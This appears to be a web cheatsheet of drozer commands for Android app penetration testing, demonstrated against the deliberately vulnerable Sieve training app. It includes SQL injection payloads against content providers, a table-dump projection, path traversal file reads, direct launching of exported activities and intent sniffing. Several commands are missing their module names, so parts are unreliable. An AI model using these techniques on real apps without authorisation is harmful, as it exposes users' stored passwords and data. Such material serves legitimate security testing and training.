Skip to content

Drozer cheatsheet

Setup drozer

Android Penetration Tools Walkthrough Series: Drozer - Infosec Resources (

Get drozer shell

`adb forward tcp:31415 tcp:31415`
`drozer console connect`

Content Providers

  • Get info from exposed content providers run -a com.mwr.example.sieve

Note: content provider queries take the form content://name.of.package.class/declared_name

  • Drozer can guess and try several URIs run scanner.provider.finduris -a com.mwr.example.sieve
  • Query Content Provider (database based) run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --vertical
  • Update and delete content provider (database based) Exploiting Content Providers - HackTricks
  • Manual SQL Injection test run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  • Manual SQL Lite Dump run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
  • Automatic SQL Discovery run scanner.provider.injection -a com.mwr.example.sieve
  • Read Files run content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  • Automatic Path Traversal Discovery run scanner.provider.traversal -a com.mwr.example.sieve


  • Examine Permissions and custom permissions run -a
  • pull invocable URIs(deep links/app links) from the AndroidManifest.xml file

    run scanner.activity.browsable -a
      Invocable URIs:

  • Call deeplinks run app.activity.start --action android.intent.action.VIEW --data-uri "sms://0123456789"

Exported IPC components

  • Enumerate exported run app.package.attacksurface com.mwr.example.sieve
  • List exported content providers run app.provider.finduri com.mwr.example.sieve
  • List exported Activities run -a com.mwr.example.sieve
  • Launch Activity directly run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
  • List exported services run -a com.mwr.example.sieve
  • Interact with service run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 6345 7452 1 --extra string com.mwr.example.sieve.PASSWORD "abcdabcdabcdabcd" --bundle-as-obj
  • List broadcast recivers run -a
  • Send message to broadcast reciever run app.broadcast.send --action theBroadcast --extra string phonenumber 07123456789 --extra string newpass 12345
  • Sniff intents run app.broadcast.sniff --action theBroadcast

Scan for all debuggable applications on a device

run app.package.debuggable